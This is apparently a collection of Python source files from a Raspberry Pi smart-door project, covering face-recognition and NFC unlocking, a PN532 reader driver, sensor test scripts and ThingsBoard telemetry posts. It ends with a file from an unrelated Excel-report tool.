"text": "import face_recognition\nimport numpy as np\n\nfacelist = list(np.load('/home/pi/ZYDEMO/iota/face_encoding.npy'))\nnamelist = list(np.load('/home/pi/ZYDEMO/iota/name_encoding.npy'))\n# namelist = []\n# facelist = []\nimage = face_recognition.load_image_file('/home/pi/ZYDEMO/iota/zcy.jpg')\nface_locations = face_recognition.face_locations(image)\nface_encodings = face_recognition.face_encodings(image, face_locations)\n# global ecodinglist, namelist\nfacelist.append(face_encodings[0])\nnamelist.append('Zhang')\nnp.save('/home/pi/ZYDEMO/iota/face_encoding.npy', face_encodings)\nnp.save('/home/pi/ZYDEMO/iota/name_encoding.npy', namelist)\n"
},
{
"alpha_fraction": 0.5700288414955139,
"alphanum_fraction": 0.6245889663696289,
"avg_line_length": 37.20769119262695,
"blob_id": "ad02c0cb9cd4f6e16a73490996f84dd8fc7109a6",
"content_id": "e310bd2fe8cfdcfabb54666ff1d5ee95fbf88cdf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14901,
"license_type": "permissive",
"max_line_length": 232,
"num_lines": 390,
"path": "/test/test_pn532.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import binascii\nimport array\nfrom functools import reduce\nimport time\nimport serial\n\nPN532_PREAMBLE = 0x00\nPN532_STARTCODE1 = 0x00\nPN532_STARTCODE2 = 0xFF\nPN532_POSTAMBLE = 0x00\n\nPN532_HOSTTOPN532 = 0xD4\nPN532_PN532TOHOST = 0xD5\n\n# PN532 Commands\nPN532_COMMAND_DIAGNOSE = 0x00\nPN532_COMMAND_GETFIRMWAREVERSION = 0x02\nPN532_COMMAND_GETGENERALSTATUS = 0x04\nPN532_COMMAND_READREGISTER = 0x06\nPN532_COMMAND_WRITEREGISTER = 0x08\nPN532_COMMAND_READGPIO = 0x0C\nPN532_COMMAND_WRITEGPIO = 0x0E\nPN532_COMMAND_SETSERIALBAUDRATE = 0x10\nPN532_COMMAND_SETPARAMETERS = 0x12\nPN532_COMMAND_SAMCONFIGURATION = 0x14\nPN532_COMMAND_POWERDOWN = 0x16\nPN532_COMMAND_RFCONFIGURATION = 0x32\nPN532_COMMAND_RFREGULATIONTEST = 0x58\nPN532_COMMAND_INJUMPFORDEP = 0x56\nPN532_COMMAND_INJUMPFORPSL = 0x46\nPN532_COMMAND_INLISTPASSIVETARGET = 0x4A\nPN532_COMMAND_INATR = 0x50\nPN532_COMMAND_INPSL = 0x4E\nPN532_COMMAND_INDATAEXCHANGE = 0x40\nPN532_COMMAND_INCOMMUNICATETHRU = 0x42\nPN532_COMMAND_INDESELECT = 0x44\nPN532_COMMAND_INRELEASE = 0x52\nPN532_COMMAND_INSELECT = 0x54\nPN532_COMMAND_INAUTOPOLL = 0x60\nPN532_COMMAND_TGINITASTARGET = 0x8C\nPN532_COMMAND_TGSETGENERALBYTES = 0x92\nPN532_COMMAND_TGGETDATA = 0x86\nPN532_COMMAND_TGSETDATA = 0x8E\nPN532_COMMAND_TGSETMETADATA = 0x94\nPN532_COMMAND_TGGETINITIATORCOMMAND = 0x88\nPN532_COMMAND_TGRESPONSETOINITIATOR = 0x90\nPN532_COMMAND_TGGETTARGETSTATUS = 0x8A\n\nPN532_RESPONSE_INDATAEXCHANGE = 0x41\nPN532_RESPONSE_INLISTPASSIVETARGET = 0x4B\n\nPN532_WAKEUP = 0x55\n\nPN532_SPI_STATREAD = 0x02\nPN532_SPI_DATAWRITE = 0x01\nPN532_SPI_DATAREAD = 0x03\nPN532_SPI_READY = 0x01\n\nPN532_MIFARE_ISO14443A = 0x00\n\n# Mifare Commands\nMIFARE_CMD_AUTH_A = 0x60\nMIFARE_CMD_AUTH_B = 0x61\nMIFARE_CMD_READ = 0x30\nMIFARE_CMD_WRITE = 0xA0\nMIFARE_CMD_TRANSFER = 0xB0\nMIFARE_CMD_DECREMENT = 0xC0\nMIFARE_CMD_INCREMENT = 0xC1\nMIFARE_CMD_STORE = 0xC2\nMIFARE_ULTRALIGHT_CMD_WRITE = 0xA2\n\n# Prefixes for NDEF Records (to identify record type)\nNDEF_URIPREFIX_NONE = 0x00\nNDEF_URIPREFIX_HTTP_WWWDOT = 0x01\nNDEF_URIPREFIX_HTTPS_WWWDOT = 0x02\nNDEF_URIPREFIX_HTTP = 0x03\nNDEF_URIPREFIX_HTTPS = 0x04\nNDEF_URIPREFIX_TEL = 0x05\nNDEF_URIPREFIX_MAILTO = 0x06\nNDEF_URIPREFIX_FTP_ANONAT = 0x07\nNDEF_URIPREFIX_FTP_FTPDOT = 0x08\nNDEF_URIPREFIX_FTPS = 0x09\nNDEF_URIPREFIX_SFTP = 0x0A\nNDEF_URIPREFIX_SMB = 0x0B\nNDEF_URIPREFIX_NFS = 0x0C\nNDEF_URIPREFIX_FTP = 0x0D\nNDEF_URIPREFIX_DAV = 0x0E\nNDEF_URIPREFIX_NEWS = 0x0F\nNDEF_URIPREFIX_TELNET = 0x10\nNDEF_URIPREFIX_IMAP = 0x11\nNDEF_URIPREFIX_RTSP = 0x12\nNDEF_URIPREFIX_URN = 0x13\nNDEF_URIPREFIX_POP = 0x14\nNDEF_URIPREFIX_SIP = 0x15\nNDEF_URIPREFIX_SIPS = 0x16\nNDEF_URIPREFIX_TFTP = 0x17\nNDEF_URIPREFIX_BTSPP = 0x18\nNDEF_URIPREFIX_BTL2CAP = 0x19\nNDEF_URIPREFIX_BTGOEP = 0x1A\nNDEF_URIPREFIX_TCPOBEX = 0x1B\nNDEF_URIPREFIX_IRDAOBEX = 0x1C\nNDEF_URIPREFIX_FILE = 0x1D\nNDEF_URIPREFIX_URN_EPC_ID = 0x1E\nNDEF_URIPREFIX_URN_EPC_TAG = 0x1F\nNDEF_URIPREFIX_URN_EPC_PAT = 0x20\nNDEF_URIPREFIX_URN_EPC_RAW = 0x21\nNDEF_URIPREFIX_URN_EPC = 0x22\nNDEF_URIPREFIX_URN_NFC = 0x23\n\nPN532_GPIO_VALIDATIONBIT = 0x80\nPN532_GPIO_P30 = 0\nPN532_GPIO_P31 = 1\nPN532_GPIO_P32 = 2\nPN532_GPIO_P33 = 3\nPN532_GPIO_P34 = 4\nPN532_GPIO_P35 = 5\n\nPN532_ACK_STRING = \"0000ff00ff00\"\nPN532_ACK_FRAME = \"\\x00\\x00\\xFF\\x00\\xFF\\x00\"\n\n\ndef millis():\n return int(round(time.time() * 1000))\n\n\nclass PN532(object):\n\n def __init__(self, uart_port=\"COM5\", uart_baudrate=115200):\n self.status = False\n self.message = \"\"\n\n print(\"Port:\" + uart_port)\n try:\n 
self.ser = serial.Serial(uart_port, uart_baudrate)\n self.ser.timeout = 2\n self.status = True\n except serial.SerialException:\n print(\"Opening port error.\")\n self.status = False\n\n def _uint8_add(self, a, b):\n \"\"\"Add add two values as unsigned 8-bit values.\"\"\"\n return ((a & 0xFF) + (b & 0xFF)) & 0xFF\n\n def _busy_wait_ms(self, ms):\n \"\"\"Busy wait for the specified number of milliseconds.\"\"\"\n start = time.time()\n delta = ms / 1000.0\n while (time.time() - start) <= delta:\n pass\n\n def _write_frame(self, data):\n ack = False\n \"\"\"Write a frame to the PN532 with the specified data bytearray.\"\"\"\n assert data is not None and 0 < len(data) < 255, 'Data must be array of 1 to 255 bytes.'\n # Build frame to send as:\n # - Preamble (0x00)\n # - Start code (0x00, 0xFF)\n # - Command length (1 byte)\n # - Command length checksum\n # - Command bytes\n # - Checksum\n # - Postamble (0x00)\n length = len(data)\n frame = bytearray(length + 7)\n frame[0] = PN532_PREAMBLE\n frame[1] = PN532_STARTCODE1\n frame[2] = PN532_STARTCODE2\n frame[3] = length & 0xFF\n frame[4] = self._uint8_add(~length, 1)\n frame[5:-2] = data\n checksum = reduce(self._uint8_add, data, 0xFF)\n frame[-2] = ~checksum & 0xFF\n frame[-1] = PN532_POSTAMBLE\n # Send frame.\n self.ser.flushInput()\n while (not ack):\n self.ser.write(frame)\n ack = self._ack_wait(1000)\n time.sleep(0.3)\n return ack\n\n def _ack_wait(self, timeout):\n ack = False\n rx_info = \"\"\n start_time = millis()\n current_time = start_time\n while ((current_time - start_time) < timeout and not ack):\n time.sleep(0.12) # Stability on receive\n rx_info += self.ser.read(self.ser.inWaiting())\n current_time = millis()\n if (PN532_ACK_STRING in rx_info.encode(\"hex\")):\n ack = True\n if (ack):\n if (len(rx_info) > 6):\n rx_info = rx_info.split(PN532_ACK_FRAME)\n self.message = ''.join(rx_info)\n else:\n self.message = rx_info\n self.ser.flush()\n return ack\n else:\n self.message = \"\"\n return ack\n\n def _read_data(self, count):\n timeout = 1000\n rx_info = \"\"\n if (self.message == \"\"):\n self._ack_wait(1000)\n else:\n rx_info = self.message\n rx_info = array.array('B', rx_info)\n return rx_info\n\n def _read_frame(self, length):\n \"\"\"Read a response frame from the PN532 of at most length bytes in size.\n Returns the data inside the frame if found, otherwise raises an exception\n if there is an error parsing the frame. 
Note that less than length bytes\n might be returned!\n \"\"\"\n # Read frame with expected length of data.\n response = self._read_data(length + 8)\n # Check frame starts with 0x01 and then has 0x00FF (preceeded by optional\n # zeros).\n if not (PN532_ACK_FRAME == response.tostring()):\n if response[0] != 0x00:\n raise RuntimeError('Response frame does not start with 0x01!')\n # Swallow all the 0x00 values that preceed 0xFF.\n offset = 1\n while response[offset] == 0x00:\n offset += 1\n if offset >= len(response):\n raise RuntimeError('Response frame preamble does not contain 0x00FF!')\n if response[offset] != 0xFF:\n raise RuntimeError('Response frame preamble does not contain 0x00FF!')\n offset += 1\n if offset >= len(response):\n raise RuntimeError('Response contains no data!')\n # Check length & length checksum match.\n frame_len = response[offset]\n if (frame_len + response[offset + 1]) & 0xFF != 0:\n raise RuntimeError('Response length checksum did not match length!')\n # Check frame checksum value matches bytes.\n checksum = reduce(self._uint8_add, response[offset + 2:offset + 2 + frame_len + 1], 0)\n if checksum != 0:\n raise RuntimeError('Response checksum did not match expected value!')\n # Return frame data.\n return response[offset + 2:offset + 2 + frame_len]\n else:\n return \"no_card\"\n\n def wakeup(self):\n # msg = '\\x55\\x55\\x00\\x00\\x00'\n msg = '\\x55\\x55\\x00\\x00\\x00'.encode()\n self.ser.write(msg)\n\n def call_function(self, command, response_length=0, params=[], timeout_sec=1):\n \"\"\"Send specified command to the PN532 and expect up to response_length\n bytes back in a response. Note that less than the expected bytes might\n be returned! Params can optionally specify an array of bytes to send as\n parameters to the function call. Will wait up to timeout_secs seconds\n for a response and return a bytearray of response bytes, or None if no\n response is available within the timeout.\n \"\"\"\n # Build frame data with command and parameters.\n data = bytearray(2 + len(params))\n data[0] = PN532_HOSTTOPN532\n data[1] = command & 0xFF\n data[2:] = params\n # Send frame and wait for response.\n if not self._write_frame(data):\n return None\n # Read response bytes.\n response = self._read_frame(response_length + 2)\n # Check that response is for the called function.\n if not (response == \"no_card\"):\n if not (response[0] == PN532_PN532TOHOST and response[1] == (command + 1)):\n raise RuntimeError('Received unexpected command response!')\n # Return response data.\n return response[2:]\n else:\n return response\n\n def begin(self):\n \"\"\"Initialize communication with the PN532. Must be called before any\n other calls are made against the PN532.\n \"\"\"\n self.wakeup()\n\n def get_firmware_version(self):\n \"\"\"Call PN532 GetFirmwareVersion function and return a tuple with the IC,\n Ver, Rev, and Support values.\n \"\"\"\n response = self.call_function(PN532_COMMAND_GETFIRMWAREVERSION, 4)\n if response is None:\n raise RuntimeError(\n 'Failed to detect the PN532! 
Make sure there is sufficient power (use a 1 amp or greater power supply), the PN532 is wired correctly to the device, and the solder joints on the PN532 headers are solidly connected.')\n return (response[0], response[1], response[2], response[3])\n\n def SAM_configuration(self):\n \"\"\"Configure the PN532 to read MiFare cards.\"\"\"\n # Send SAM configuration command with configuration for:\n # - 0x01, normal mode\n # - 0x14, timeout 50ms * 20 = 1 second\n # - 0x01, use IRQ pin\n # Note that no other verification is necessary as call_function will\n # check the command was executed as expected.\n self.call_function(PN532_COMMAND_SAMCONFIGURATION, params=[0x01, 0x14, 0x01])\n\n def read_passive_target(self, card_baud=PN532_MIFARE_ISO14443A, timeout_sec=1):\n \"\"\"Wait for a MiFare card to be available and return its UID when found.\n Will wait up to timeout_sec seconds and return None if no card is found,\n otherwise a bytearray with the UID of the found card is returned.\n \"\"\"\n # Send passive read command for 1 card. Expect at most a 7 byte UUID.\n response = self.call_function(PN532_COMMAND_INLISTPASSIVETARGET,\n params=[0x01, card_baud],\n response_length=17)\n # If no response is available return None to indicate no card is present.\n if response is None:\n return None\n if not (response == \"no_card\"):\n # Check only 1 card with up to a 7 byte UID is present.\n if response[0] != 0x01:\n raise RuntimeError('More than one card detected!')\n if response[5] > 7:\n raise RuntimeError('Found card with unexpectedly long UID!')\n # Return UID of card.\n return response[6:6 + response[5]]\n else:\n return response\n\n def mifare_classic_authenticate_block(self, uid, block_number, key_number, key):\n \"\"\"Authenticate specified block number for a MiFare classic card. Uid\n should be a byte array with the UID of the card, block number should be\n the block to authenticate, key number should be the key type (like\n MIFARE_CMD_AUTH_A or MIFARE_CMD_AUTH_B), and key should be a byte array\n with the key data. Returns True if the block was authenticated, or False\n if not authenticated.\n \"\"\"\n # Build parameters for InDataExchange command to authenticate MiFare card.\n uidlen = len(uid)\n keylen = len(key)\n params = bytearray(3 + uidlen + keylen)\n params[0] = 0x01 # Max card numbers\n params[1] = key_number & 0xFF\n params[2] = block_number & 0xFF\n params[3:3 + keylen] = key\n params[3 + keylen:] = uid\n # Send InDataExchange request and verify response is 0x00.\n response = self.call_function(PN532_COMMAND_INDATAEXCHANGE,\n params=params,\n response_length=1)\n return response[0] == 0x00\n\n def mifare_classic_read_block(self, block_number):\n \"\"\"Read a block of data from the card. Block number should be the block\n to read. If the block is successfully read a bytearray of length 16 with\n data starting at the specified block will be returned. If the block is\n not read then None will be returned.\n \"\"\"\n # Send InDataExchange request to read block of MiFare data.\n response = self.call_function(PN532_COMMAND_INDATAEXCHANGE,\n params=[0x01, MIFARE_CMD_READ, block_number & 0xFF],\n response_length=17)\n # Check first response is 0x00 to show success.\n if response[0] != 0x00:\n return None\n # Return first 4 bytes since 16 bytes are always returned.\n return response[1:]\n\n def mifare_classic_write_block(self, block_number, data):\n \"\"\"Write a block of data to the card. 
Block number should be the block\n to write and data should be a byte array of length 16 with the data to\n write. If the data is successfully written then True is returned,\n otherwise False is returned.\n \"\"\"\n assert data is not None and len(data) == 16, 'Data must be an array of 16 bytes!'\n # Build parameters for InDataExchange command to do MiFare classic write.\n params = bytearray(19)\n params[0] = 0x01 # Max card numbers\n params[1] = MIFARE_CMD_WRITE\n params[2] = block_number & 0xFF\n params[3:] = data\n # Send InDataExchange request.\n response = self.call_function(PN532_COMMAND_INDATAEXCHANGE,\n params=params,\n response_length=1)\n return response[0] == 0x00\n"
},
{
"alpha_fraction": 0.526035487651825,
"alphanum_fraction": 0.5443786978721619,
"avg_line_length": 23.492753982543945,
"blob_id": "35fb8a33dccae181cc33c251096831f821cd9df5",
"content_id": "d56cdd2d0020de45c46ad10ae8ac0bdbcf025fe5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1690,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 69,
"path": "/acceleration.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "from mpu6050 import mpu6050\nimport time\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef acceleration():\n sensor = mpu6050(0x68)\n time_dic = []\n start_time = time.time()\n # print(start_time)\n # print(start_time + 3)\n while True:\n if time.time() < (start_time + 5.1):\n # start_time = time.time()\n accelerometer_data = sensor.get_accel_data()\n time_dic.append(accelerometer_data)\n time.sleep(0.1)\n # end_time = time.time()\n # print(end_time-start_time)\n # print(time_dic)\n else:\n # print(time_dic)\n # break\n return time_dic\n\n\ndef data_handle(time_data):\n time_x_data = []\n time_y_data = []\n time_z_data = []\n\n count = len(time_data)\n\n for i in range(count):\n time_x_data.append(time_data[i]['x'])\n time_y_data.append(time_data[i]['y'])\n time_z_data.append(time_data[i]['z'])\n # print(time_x_data)\n # print(time_y_data)\n # print(time_z_data)\n return [count, time_x_data, time_y_data, time_z_data]\n\n\ndef plt_data():\n count, x_data, y_data, z_data = data_handle(acceleration())\n x_avg = sum(x_data) / count\n y_avg = sum(y_data) / count\n z_avg = sum(z_data) / count\n x = np.arange(0, count / 10, 0.1)\n y1 = np.array(x_data)\n y2 = np.array(y_data)\n y3 = np.array(z_data)\n\n plt.plot(x, y1, color='r', label='x_acc')\n plt.plot(x, y2, color='b', label='y_acc')\n plt.plot(x, y3, color='y', label='z_acc')\n\n plt.legend()\n\n plt.xlabel('time')\n plt.ylabel('m/s')\n\n plt.show()\n print('acc_avg',x_avg, y_avg, z_avg)\n\n\nif __name__ == '__main__':\n plt_data()\n"
},
{
"alpha_fraction": 0.4739776849746704,
"alphanum_fraction": 0.5297397971153259,
"avg_line_length": 15.8125,
"blob_id": "94f0651ff5ae18831e9a571421a070dd625771f3",
"content_id": "a5a855caf55f26cfec23e35074194fb0f91974ab",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 32,
"path": "/test/test_pcf8591.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import smbus\nimport time\n\n\ndef Print(value):\n if value == 0:\n print('no magnet')\n if value == 1:\n print('magnet north')\n if value == -1:\n print('magnet south')\n\n\naddress = 0x48\nA0 = 0x40\n\nbus = smbus.SMBus(11)\nstatus = 0\n\nwhile True:\n bus.write_byte(address, A0)\n data = bus.read_byte(address)\n if 5 > data - 133 > -5:\n value = 0\n if data < 128:\n value = -1\n if data > 138:\n value = 1\n if data != status:\n Print(value)\n status = value\n time.sleep(0.2)\n"
},
{
"alpha_fraction": 0.5451894998550415,
"alphanum_fraction": 0.5510203838348389,
"avg_line_length": 33.349998474121094,
"blob_id": "283bd3b2fc3f7bfd80b290df9d09e1d0339d65b4",
"content_id": "608e51a9b8cb052abca4d7d067c279fe90634984",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 686,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 20,
"path": "/btn.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nfrom open import open_door\n\ndef btn_press():\n while True:\n # print('btn_start')\n btn_pin = 26\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(btn_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n if GPIO.input(btn_pin) == 0:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print('press open at ', current_time)\n open_door(current_time)\n with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as log_fp:\n log_fp.write('button open at ' + str(current_time) + '\\n')\n log_fp.flush()\n time.sleep(2)"
},
{
"alpha_fraction": 0.48503485321998596,
"alphanum_fraction": 0.4965149760246277,
"avg_line_length": 33.35211181640625,
"blob_id": "482d3879528e6688cc65d4879ce55bd5447d3887",
"content_id": "5ed6962b68f0dd737e417dae9daa4020a354d07c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2439,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 71,
"path": "/nfc.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import subprocess\nimport time\nfrom open import open_door\nimport requests\n\n\ndef check(nfc_list):\n with open('/home/pi/ZYDEMO/iota/nfc_list.txt', 'r') as nfc_fp:\n data = nfc_fp.readlines()\n # print(nfc_list)\n if nfc_list in data[0]:\n # print(nfc_list[0])\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print('nfc open at ', current_time)\n open_door(current_time)\n with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as log_fp:\n log_fp.write(\n 'nfc ' + nfc_list + ' open at ' + str(current_time) + '\\n')\n log_fp.flush()\n\n nfc_payload = \"{{\\\"card_no\\\": {}}}\".format(str(nfc_list))\n requests.post(url='https://demo.thingsboard.io/api/v1/iK0zWkznWEoYqBnmAtQf/telemetry', data=nfc_payload)\n\n time.sleep(2)\n # return True\n # count = len(data)\n # for i in range(count):\n # temp_data = data[i].split(',')\n # r_nfcid = temp_data[0]\n # r_sakid = temp_data[1]\n # r_atsid = temp_data[2]\n # if nfc_list[2] is 0:\n # if nfc_list[0] == r_nfcid and nfc_list[1] == r_sakid:\n # return True\n # else:\n # if nfc_list[1] == r_sakid and nfc_list[2] == r_atsid:\n # return True\n # if i == count:\n # return False\n\n\ndef nfc():\n while True:\n time.sleep(0.2)\n output = str(subprocess.Popen(['nfc-list'], stdout=subprocess.PIPE, shell=True).communicate()[0])\n # print(output)\n nfc_start = 'NFCID'\n # sak_start = 'SEL_RES'\n # ats_start = 'ATS'\n nfc_index = output.find(nfc_start)\n # sak_index = output.find(sak_start)\n nfcid = output[nfc_index + 8:nfc_index + 24].replace(' ', '')\n\n # if ats_start in output:\n # ats_index = output.find(ats_start)\n # atsid = output[ats_index + 4:ats_index + 14]\n # sakid = output[sak_index + 9:ats_index]\n # else:\n # sakid = output[sak_index + 9:sak_index + 17]\n # atsid = 0\n # if nfcid !='istuseslibnfc':\n # print(nfcid)\n # check(nfcid)\n # print(sakid)\n # print(atsid)\n # return [nfcid, sakid, atsid]\n # return nfcid\n check(nfcid)\n\n# temp = check(nfc())\n# print(temp)\n"
},
{
"alpha_fraction": 0.44242823123931885,
"alphanum_fraction": 0.49191686511039734,
"avg_line_length": 32.30769348144531,
"blob_id": "207a4b77e8559d71c1fe995c4f0da0e2d938d53a",
"content_id": "e0e2048950a53c7e848c7a914a379087db9baf2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3491,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 91,
"path": "/camera_servo.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "# coding = utf-8\nimport face_recognition\nimport cv2\nimport RPi.GPIO as GPIO\nimport time\nfrom face_rec import face_rec\nfrom open import open_door\nimport requests\n\n\ndef setServoAngle(servo, angle):\n '''\n :param servo 控制舵机的引脚编号,这取决于你,我用的分别是17和27\n :param angle 舵机的位置,范围是:0到180,单位是度\n return: None\n '''\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(servo, GPIO.OUT)\n pwm = GPIO.PWM(servo, 50)\n pwm.start(8)\n dutyCycle = angle / 18. + 2.\n pwm.ChangeDutyCycle(dutyCycle)\n time.sleep(0.3)\n pwm.stop()\n GPIO.cleanup()\n\n\n# x0, y0 = 80, 0\n# setServoAngle(18, x0) # x axis\n# setServoAngle(17, y0) # y axis\n\ndef start_camera():\n while True:\n # 创建视频对象,打开摄像头\n video_capture = cv2.VideoCapture('http://192.168.123.122:8080/?action=stream')\n ret, pframe = video_capture.read()\n # print(ret,'image capture')\n # 释放视频对象\n # video_capture.release()\n if pframe is not None:\n frame = cv2.resize(pframe, (0, 0), fx=0.25, fy=0.25) # 这里将分辨率缩小为1/4,故比例系数增大为4倍,现在是0.078125*4 = 0.3125\n # frame = pframe\n output = frame[:, :, ::-1]\n\n # 确定脸的位置\n face_locations = face_recognition.face_locations(output)\n if face_locations:\n x = (face_locations[0][1] + face_locations[0][3]) / 2\n y = (face_locations[0][0] + face_locations[0][2]) / 2\n print(x, y) # 输出脸中心到右上顶点的水平和垂直距离\n # else:\n # x, y = 80, 60 # 如果没有脸则让舵机保持不动,相当于脸在中央(这时的分辨率为160*120)\n\n # 计算出舵机应该移动的角度,正负与你舵机的安装方式有关\n # dx = (80 - x) * 0.2375\n # dy = -(y - 60) * 0.2375\n\n # if abs(dx) >= 3: # 设置一个阈值,当角度大于3时,才移动,避免舵机一直在原地抖动,下同\n # x0 += dx\n # if x0 > 180: # 设置界限,超出范围不再转动,下同\n # x0 = 180\n # elif x0 < 0:\n # x0 = 0\n # setServoAngle(18, x0) # 水平方向的舵机控制\n #\n # if abs(dy) >= 3: # 设置阈值\n # y0 += dy\n # if y0 > 180:\n # y0 = 180\n # elif y0 < 0:\n # y0 = 0\n # print('y0', y0)\n # setServoAngle(17, y0) # 垂直方向的舵机控制\n\n flag = face_rec(video_capture, output, face_locations)\n # print(flag)\n # return flag\n if flag is not None:\n if flag[0] is True:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n open_door(current_time)\n\n face_payload = \"{{\\\"face\\\": \\\"{}\\\"}}\".format(str(flag[1]))\n requests.post(url='https://demo.thingsboard.io/api/v1/fYCni97AxcU7lWxyrhvU/telemetry', data=face_payload)\n\n with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as log_fp:\n log_fp.write(\n 'person ' + flag[1] + ' open at ' + str(current_time) + '\\n')\n log_fp.flush()\n"
}
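The duty-cycle formula in setServoAngle above maps the 0-180 degree range onto a 2%-12% duty cycle at 50 Hz (a 20 ms period), i.e. a 0.4-2.4 ms pulse. A worked check of that arithmetic:

def duty_cycle(angle):
    # same mapping as setServoAngle: angle / 18 + 2
    return angle / 18.0 + 2.0

assert duty_cycle(0) == 2.0     # 2% of 20 ms  -> 0.4 ms pulse
assert duty_cycle(90) == 7.0    # 7% of 20 ms  -> 1.4 ms pulse
assert duty_cycle(180) == 12.0  # 12% of 20 ms -> 2.4 ms pulse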
] | 21 |
Raymondhsm/PythonDoExcel
|
https://github.com/Raymondhsm/PythonDoExcel
|
f674325c620d98807de1a06fa0c6ca0be2a772b4
|
e4efbf41566fb033e2729b159fb579dba13bfdb8
|
70d8f3e9d8d4d4f9cc78f5d7555edff741a5363f
|
refs/heads/master
| 2020-08-30T06:40:38.761351 | 2019-11-29T06:24:51 | 2019-11-29T06:24:51 | 218,293,513 | 3 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6346733570098877,
"alphanum_fraction": 0.6346733570098877,
"avg_line_length": 25.864864349365234,
"blob_id": "1bb14339847b998ffcef9283816b6f21fd6486b6",
"content_id": "c8f12701a205df9cdc9b60b5b5d28c3f5cbbe9e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2278,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 74,
"path": "/src/guide.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from os import listdir,system\nfrom openpyxl import load_workbook,Workbook\n\nfrom error import ErrorList,Error,Warning,processException\nfrom log import Logger\nimport utils\nimport saleAmount\nimport refund\nimport profit\nimport notfound\n\n\ndef __doSA(path = \"./\"):\n _option = input(\"是否要做金额录入,是就输入点东西,否就啥也不输:\")\n _doSA = False if _option == \"\" else True\n Logger.addLog(\"输入:{},退款{}\".format(_option, _doSA))\n\n _option = input(\"是否要做退款录入,是就输入点东西,否就啥也不输:\")\n _doRefund = False if _option == \"\" else True\n Logger.addLog(\"输入:{},退款{}\".format(_option, _doRefund))\n\n _summaryPath = utils.getReportPath(path, \"summary\")\n try:\n print(\"正在打开汇总表...\")\n _summary = load_workbook(_summaryPath)\n except:\n processException()\n \n # 获取notfound表\n NF = notfound.NotFound()\n _notfoundTable = NF.getNotfoundTable()\n\n # 处理销售额\n if _doSA:\n SA = saleAmount.SaleAmount(_summary,_notfoundTable)\n SA.processDir(path)\n\n # 处理退款\n if _doRefund:\n _refundPath = utils.getReportPath(path,\"refund\",onlyXlsx=False, canSkip=True)\n\n if _refundPath is not None:\n RF = refund.Refund(_summary, _notfoundTable)\n RF.processRefundInfo(_refundPath)\n\n # 保存文件\n _summaryName = input(\"输点什么东西当输出文件名呗:\")\n if _summaryName == \"\":\n _summary.save(path + \"/summary.xlsx\")\n else:\n _summary.save(path+ \"/\" + _summaryName)\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE,_summaryName)\n\n NF.save()\n\n\ndef __doPF(path = \"./\"):\n _originPath = utils.getReportPath(path,\"originfile\",False)\n _updatePath = utils.getReportPath(path,\"updatefile\")\n\n PF = profit.Profit(_originPath, _updatePath)\n PF.processProfitUpdate()\n PF.save()\n pass\n\n\ndef doGuide(path = \"./\"):\n option = input(\"输入点东西就进入更新成本功能,什么都不输就进入更新汇总表功能:\")\n if option == \"\":\n Logger.addLog(\"输入:{},处理saleAmount。\".format(option))\n __doSA(path)\n else :\n Logger.addLog(\"输入:{},处理更新成本\".format(option))\n __doPF(path)\n\n\n"
},
{
"alpha_fraction": 0.5042446851730347,
"alphanum_fraction": 0.5086142420768738,
"avg_line_length": 38.85572052001953,
"blob_id": "25f27cec703e2b9f4a27a7c48f4d3fd86bacc0a0",
"content_id": "ee7965059690198bf63aeb7e988111220ac062de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8040,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 201,
"path": "/src/refund.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
